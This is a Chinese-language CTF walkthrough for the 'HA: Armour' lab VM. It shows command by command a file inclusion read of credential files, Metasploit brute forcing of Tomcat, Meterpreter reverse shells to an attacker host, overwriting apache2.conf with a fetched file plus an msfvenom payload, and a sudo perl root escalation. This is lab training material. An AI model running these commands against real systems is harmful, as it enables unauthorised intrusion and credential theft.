zoukankan      html  css  js  c++  java
  • HA: Armour-Write-up


    下载地址:点我

    bilibili:点我

    信息收集

    • nmap扫存活找到IP为:192.168.116.140
    ➜  ~ nmap -sn 192.168.116.1/24      
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
    Nmap scan report for 192.168.116.1
    Host is up (0.00031s latency).
    Nmap scan report for 192.168.116.140
    Host is up (0.00074s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
    ➜  ~ nmap -A -T4 192.168.116.140 -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
    Nmap scan report for 192.168.116.140
    Host is up (0.0018s latency).
    Not shown: 65531 closed ports
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA: Armour
    8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
    | ajp-methods: 
    |_  Supported methods: GET HEAD POST OPTIONS
    8080/tcp  open  http    Apache Tomcat 9.0.24
    |_http-favicon: Apache Tomcat
    |_http-title: Apache Tomcat/9.0.24
    65534/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
    |   256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
    |_  256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
    ➜  ~
    
    • 开放80,8009,8080端口,都是Web服务分别是Apache httpd,Apache Jserv和Apache Tomcat,还有一个65534端口为ssh服务。
    • 指定端口连接ssh,得到第一个flag:HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA},和提示:TheOlympics
    ➜  ~ ssh 192.168.116.140 -p65534      
    The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
    ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.
    
                                                                                                 
           db         88888888ba   88b           d88    ,ad8888ba,    88        88  88888888ba   
          d88b        88      "8b  888b         d888   d8"'    `"8b   88        88  88      "8b  
         d8'`8b       88      ,8P  88`8b       d8'88  d8'        `8b  88        88  88      ,8P  
        d8'  `8b      88aaaaaa8P'  88 `8b     d8' 88  88          88  88        88  88aaaaaa8P'  
       d8YaaaaY8b     88""""88'    88  `8b   d8'  88  88          88  88        88  88""""88'    
      d8""""""""8b    88    `8b    88   `8b d8'   88  Y8,        ,8P  88        88  88    `8b    
     d8'        `8b   88     `8b   88    `888'    88   Y8a.    .a8P   Y8a.    .a8P  88     `8b   
    d8'          `8b  88      `8b  88     `8'     88    `"Y8888Y"'     `"Y8888Y"'   88      `8b  
                                                                                                 
                                                                                                 
                                    www.hackingarticles.in
    
                     HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
                            
                                  Hint 1: TheOlympics
    
    kali-team@192.168.116.140's password:
    
    • 浏览器访问80端口,F12发现注释里有armour,notes.txt,还有69,开始不知道什么意思。但是对TCP/UDP端口列表熟悉的话,可以猜出来是TFTP(小型文件传输协议)的端口,详细TCP/UDP端口列表
    • 可以使用nmap加UDP协议判断69端口是否开放。
    ➜  ~ sudo  nmap -sU -p69 192.168.116.140
    [sudo] kali-team 的密码:
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
    Nmap scan report for 192.168.116.140
    Host is up (0.00073s latency).
    
    PORT   STATE         SERVICE
    69/udp open|filtered tftp
    MAC Address: 00:0C:29:E7:98:9F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
    
    • 因为要发送UDP报文,所以要加sudo以Root权限执行。发现目标有开放69端口。
    • TFTP客户端连上服务端下载notes.txt文件,得到第二个flag。
    ➜  ~ atftp                
    tftp> connect 192.168.116.140
    tftp> get notes.txt
    tftp> quit 
    ➜  ~ cat notes.txt
    Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}
    
    Hint 2: maybeevena
    ➜  ~
    
    • 还有一个提示maybeevena,不知道什么鬼。先爆破80端口的php后缀文件。
    ➜  ~ dirb http://192.168.116.140 -X .php
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Wed Oct  9 22:23:10 2019
    URL_BASE: http://192.168.116.140/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.140/ ----
    + http://192.168.116.140/file.php (CODE:200|SIZE:0)                                                                                                                                                                                           
                                                                                                                                                                                                                                                  
    -----------------
    END_TIME: Wed Oct  9 22:23:13 2019
    DOWNLOADED: 4612 - FOUND: 1
    ➜  ~
    
    • 找到file.php,打开页面一片空白,fuzz参数。
    ➜  ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd' 
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************
    
    Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
    Total requests: 77
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
    ===================================================================
    
    000000033:   200        28 L     36 W     1437 Ch     "file"                                                                                                                                                                        
    
    Total time: 0.130840
    Processed Requests: 77
    Filtered Requests: 76
    Requests/sec.: 588.5036
    
    ➜  ~
    
    • 找到参数为file,还是一个文件读取漏洞,因为是Apache的服务,所以先想到读取Apache相关的文件,敏感的文件有.htpasswd,一般在/etc/apache2/.htpasswd
    ➜  ~ curl http://192.168.116.140/file.php?file=/etc/apache2/.htpasswd                      
    Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}
    
    
    Hint 3: StarBucks
    ➜  ~
    
    • 找到第三个flag,和第三个提示:StarBucks。
    • 官方提示:

    P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

    • 三个提示拼起来就是:TheOlympics maybeevena starBucks,强行当密码。

    tomcat 获取会话

    • 浏览器打开8080端口,发现是一个Tomcat的管理页面,密码已经知道,现在来爆破用户名。
    ➜  CeWL git:(master) ✗ ./cewl.rb -v  http://192.168.116.140 -d 10 -w dict.txt 
    CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
    Starting at http://192.168.116.140
    Visiting: http://192.168.116.140, got response code 200
    Attribute text found:
    
    
    Offsite link, not following: https://hackingarticles.in
    Writing words to file
    ➜  CeWL git:(master) ✗ cat dict.txt           
    Armour
    PAGE
    CONTENT
    Header
    ARMOUR
    Collection
    Armours
    MCU
    Photo
    Grid
    armour
    End
    Page
    Content
    Footer
    Powered
    Hacking
    Articles
    notes
    txt
    ➜  CeWL git:(master) ✗ pwd               
    /home/kali-team/Kali-Team_Tools/CeWL
    ➜  CeWL git:(master) ✗
    
    • 使用CeWL爬80端口的网页生成用户名的字典,使用MSF对Tomcat进行登录密码枚举。
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options 
    
    Module options (auxiliary/scanner/http/tomcat_mgr_login):
    
       Name              Current Setting                                                 Required  Description
       ----              ---------------                                                 --------  -----------
       BLANK_PASSWORDS   true                                                            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                                                               yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false                                                           no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false                                                           no        Add all passwords in the current database to the list
       DB_ALL_USERS      false                                                           no        Add all users in the current database to the list
       PASSWORD          TheOlympicsmaybeevenaStarBucks                                  no        The HTTP password to specify for authentication
       PASS_FILE         /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
       Proxies                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS            192.168.116.140                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT             8080                                                            yes       The target port (TCP)
       SSL               false                                                           no        Negotiate SSL/TLS for outgoing connections
       STOP_ON_SUCCESS   false                                                           yes       Stop guessing when a credential works for a host
       TARGETURI         /manager/html                                                   yes       URI for Manager login. Default is /manager/html
       THREADS           1                                                               yes       The number of concurrent threads
       USERNAME                                                                          no        The HTTP username to specify for authentication
       USERPASS_FILE     /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false                                                           no        Try the username as the password for all users
       USER_FILE         /home/kali-team/Kali-Team_Tools/CeWL/dict.txt                   no        File containing users, one per line
       VERBOSE           true                                                            yes       Whether to print output for all attempts
       VHOST                                                                             no        HTTP server virtual host
    
    msf5 auxiliary(scanner/http/tomcat_mgr_login) >
    
    • 不知道为什么,我重启服务器后才枚举出来,用户名是:armour。
    • [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
    • Tomcat上传木马有很多方法,可以手工上传WAR文件部署。
    • 这里就使用MSF比较省时间。
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword                                                                                                                                                                                  
    set httppassword  
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
    httppassword => TheOlympicsmaybeevenaStarBucks
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
    httpusername => armour
    msf5 exploit(multi/http/tomcat_mgr_upload) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:4444 
    [*] Retrieving session ID and CSRF token...
    [*] Uploading and deploying wJ0oIWvcGX...
    [*] Executing wJ0oIWvcGX...
    [*] Undeploying wJ0oIWvcGX ...
    [*] Sending stage (53867 bytes) to 192.168.116.140
    [*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800
    
    meterpreter >
    
    • 枚举本地开发端口
    meterpreter > shell 
    Process 61 created.
    Channel 75 created.
    netstat -antp
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
    tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN      -                   
    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
    tcp        0      0 0.0.0.0:65534           0.0.0.0:*               LISTEN      -                   
    tcp6       0      0 :::8080                 :::*                    LISTEN      572/java            
    tcp6       0      0 :::80                   :::*                    LISTEN      -                   
    tcp6       0      0 :::65534                :::*                    LISTEN      -                   
    tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      572/java            
    tcp6       0      0 :::8009                 :::*                    LISTEN      572/java            
    tcp6       0      0 192.168.116.140:50706   192.168.116.1:4444      ESTABLISHED 685/java
    
    • 这里发现目标主机上监听着8081端口,只能在目标本地进行访问,所以我们可以把端口转发出来,MSF里有自带的。
    meterpreter > portfwd /?
    Usage: portfwd [-h] [add | delete | list | flush] [args]
    
    
    OPTIONS:
    
        -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
        -R        Indicates a reverse port forward.
        -h        Help banner.
        -i <opt>  Index of the port forward entry to interact with (see the "list" command).
        -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
        -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
        -r <opt>  Forward: remote host to connect to.
    meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
    [*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
    meterpreter >
    
    • 现在访问自己的8081端口就可以拿到第四个flag。
    ➜  ~ curl http://127.0.0.1:8081                                        
    Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
    
    • 或者直接在目标主机访问
    tomcat@ubuntu:~$ cd /tmp
    cd /tmp
    tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
    wget http://127.0.0.1:8081
    --2019-10-10 04:46:42--  http://127.0.0.1:8081/
    Connecting to 127.0.0.1:8081... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 56 [text/html]
    Saving to: ‘index.html’
    
    index.html          100%[===================>]      56  --.-KB/s    in 0s      
    
    2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
    
    tomcat@ubuntu:/tmp$ cat index.html
    cat index.html
    Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
    tomcat@ubuntu:/tmp$
    

    权限提升

    • 查找GUID文件
    tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
    find / -perm -g=s -type f 2>/dev/null
    /sbin/pam_extrausers_chkpwd
    /sbin/unix_chkpwd
    /usr/bin/crontab
    /usr/bin/expiry
    /usr/bin/chage
    /usr/bin/ssh-agent
    /usr/bin/wall
    /usr/bin/bsd-write
    /usr/bin/mlocate
    tomcat@ubuntu:/$
    
    • 查找SUID文件
    tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/umount
    /bin/su
    /bin/ping
    /bin/fusermount
    /usr/bin/vmware-user-suid-wrapper
    /usr/bin/traceroute6.iputils
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/sudo
    /usr/bin/gpasswd
    /usr/bin/chfn
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    tomcat@ubuntu:/$ 
    tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
    find / -perm -4000 2>dev/null | xargs ls -la
    -rwsr-xr-x 1 root root        30800 Aug 11  2016 /bin/fusermount
    -rwsr-xr-x 1 root root        43088 Oct 15  2018 /bin/mount
    -rwsr-xr-x 1 root root        64424 Jun 28 04:05 /bin/ping
    -rwsr-xr-x 1 root root        44664 Mar 22  2019 /bin/su
    -rwsr-xr-x 1 root root        26696 Oct 15  2018 /bin/umount
    -rwsr-xr-x 1 root root        76496 Mar 22  2019 /usr/bin/chfn
    -rwsr-xr-x 1 root root        44528 Mar 22  2019 /usr/bin/chsh
    -rwsr-xr-x 1 root root        75824 Mar 22  2019 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root        40344 Mar 22  2019 /usr/bin/newgrp
    -rwsr-xr-x 1 root root        59640 Mar 22  2019 /usr/bin/passwd
    -rwsr-xr-x 1 root root       149080 Jan 17  2018 /usr/bin/sudo
    -rwsr-xr-x 1 root root        18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 1 root root        10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
    -rwsr-xr-- 1 root messagebus  42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
    tomcat@ubuntu:/$
    
    • 查找可写目录,发现有/var/www/html
    tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
    find / -writable -type d 2>/dev/null
    /dev/mqueue
    /dev/shm
    /tftpboot
    /var/lib/php/sessions
    /var/www/html
    /var/tmp
    /proc/902/task/902/fd
    /proc/902/fd
    /proc/902/map_files
    /tmp
    
    • 查找root用户权限可写文件
    tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
    <ev/null | grep -v "/proc/" |xargs ls -al |grep root
    -rwxrwxrwx 1 root   root     7224 Sep 21 11:30 /etc/apache2/apache2.conf
    -rwxrwxrwx 1 root   tomcat   2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
    --w--w--w- 1 root   root        0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
    tomcat@ubuntu:/$
    
    • 找到/etc/apache2/apache2.conf/opt/tomcat/conf/tomcat-users.xml文件可写。
    • /opt/tomcat/conf/tomcat-users.xml只有之前的账号密码,只能看/etc/apache2/apache2.conf文件了。
    • 查找passwd文件,每行记录又被冒号(:)分隔为7个字段分别对应:用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell
    • group文件对应:组名:口令:组标识号:组内用户列表
    tomcat@ubuntu:/$ cat /etc/passwd
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
    syslog:x:102:106::/home/syslog:/usr/sbin/nologin
    messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
    _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
    uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
    armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
    tomcat:x:1001:1001::/opt/tomcat:/bin/false
    aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
    tomcat@ubuntu:/$ 
    
    
    tomcat@ubuntu:~$ cat /etc/group
    cat /etc/group
    root:x:0:
    daemon:x:1:
    bin:x:2:
    sys:x:3:
    adm:x:4:syslog,armour
    tty:x:5:
    disk:x:6:
    lp:x:7:
    mail:x:8:
    news:x:9:
    uucp:x:10:
    man:x:12:
    proxy:x:13:
    kmem:x:15:
    dialout:x:20:
    fax:x:21:
    voice:x:22:
    cdrom:x:24:armour
    floppy:x:25:
    tape:x:26:
    sudo:x:27:armour
    audio:x:29:
    dip:x:30:armour
    www-data:x:33:
    backup:x:34:
    operator:x:37:
    list:x:38:
    irc:x:39:
    src:x:40:
    gnats:x:41:
    shadow:x:42:
    utmp:x:43:
    video:x:44:
    sasl:x:45:
    plugdev:x:46:armour
    staff:x:50:
    games:x:60:
    users:x:100:
    nogroup:x:65534:
    systemd-journal:x:101:
    systemd-network:x:102:
    systemd-resolve:x:103:
    input:x:104:
    crontab:x:105:
    syslog:x:106:
    messagebus:x:107:
    mlocate:x:108:
    uuidd:x:109:
    ssh:x:110:
    armour:x:1000:
    lpadmin:x:111:armour
    sambashare:x:112:armour
    ssl-cert:x:113:
    tomcat:x:1001:
    aarti:x:1002:
    tomcat@ubuntu:~$
    
    • 找到一个普通用户aarti和armour
    • 把Apache配置文件下载到自己的电脑,Apache默认以www-data用户启动的
    http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
    
    • 修改用户和组,让Apache以上面那个普通用户启动,为什么不能以Root用户启动能?因为不重新编译是不能用Root权限的,这样Web服务也起不来。所以只能改aarti的
    • 覆盖Apache配置文件
    tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
    <p://192.168.116.1:8000/apache2.conf -O apache2.conf
    --2019-10-10 04:52:49--  http://192.168.116.1:8000/apache2.conf
    Connecting to 192.168.116.1:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 7195 (7.0K) [text/plain]
    Saving to: ‘apache2.conf’
    
    apache2.conf        100%[===================>]   7.03K  --.-KB/s    in 0s      
    
    utime(apache2.conf): Operation not permitted
    2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]
    
    tomcat@ubuntu:/etc/apache2$ cat apache2.conf
    
    • 写入后到80端口服务下的目录写木马。(这是官方出题人写的),我试了不对,创建文件的用户为Tomcat,aarti用户读不了这个文件,所以是访问不了的,服务端报500错误。
    • 后来我利用文件包含Apache的配置文件获取到了会话。
    • 就是把Shell写进Apache2.conf,再利用上面发现的文件包含漏洞。
    ➜  ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
    ➜  ~ cat shell.php >> apache2.conf 
    
    msf5 exploit(multi/handler) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:2333 
    [*] Sending stage (38288 bytes) to 192.168.116.140
    [*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800
    
    meterpreter > getuid 
    Server username: aarti (1002)
    meterpreter > shell 
    Process 12388 created.
    Channel 0 created.
    python3.6 -c 'import pty;pty.spawn("/bin/bash")'
    aarti@ubuntu:/var/www/html$ whoami
    whoami
    aarti
    aarti@ubuntu:/var/www/html$
    

    提Root权限

    • 列举无密码sudo,发现有一个perl
    aarti@ubuntu:/var/www/html$ sudo -l
    sudo -l
    Matching Defaults entries for aarti on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
    
    User aarti may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/bin/perl
    aarti@ubuntu:/var/www/html$ 
    aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
    sudo perl -e 'exec "/bin/bash";'
    root@ubuntu:/var/www/html# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:/var/www/html# 
    root@ubuntu:~# ls
    ls
    final.txt
    root@ubuntu:~# cat final.txt
    cat final.txt
    
             ______   ______    _____   _     _  ______  
       /   (_____  |  ___   / ___  | |   | |(_____  
      /     _____) )| | _ | || |   | || |   | | _____) )
     / /  (_____ ( | || || || |   | || |   | |(_____ ( 
    | |__| |      | || || || || |___| || |___| |      | |
    |______|      |_||_||_||_| \_____/  \______|      |_|
                                                         
    
        IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}
    
    
    !! Congrats you have finished this task !!
    							
    Contact us here:
    								
    Hacking Articles : https://twitter.com/rajchandel/
    		
    AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
    	
    +-+-+-+-+-+ +-+-+-+-+-+-+-+
     |E|n|j|o|y| |H|A|C|K|I|N|G|
     +-+-+-+-+-+ +-+-+-+-+-+-+-+	
    root@ubuntu:~#
    
  • 相关阅读:
    ASE19团队项目 beta阶段 model组 scrum report list
    ASE19团队项目 beta阶段 model组 scrum7 记录
    ASE19团队项目 beta阶段 model组 scrum6 记录
    ASE19团队项目 beta阶段 model组 scrum5 记录
    ASE19团队项目 beta阶段 model组 scrum4 记录
    ASE19团队项目 beta阶段 model组 scrum3 记录
    ASE19团队项目 beta阶段 model组 scrum2 记录
    ASE19团队项目 beta阶段 model组 scrum1 记录
    【ASE模型组】Hint::neural 模型与case study
    【ASE高级软件工程】第二次结对作业
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12212396.html
Copyright © 2011-2022 走看看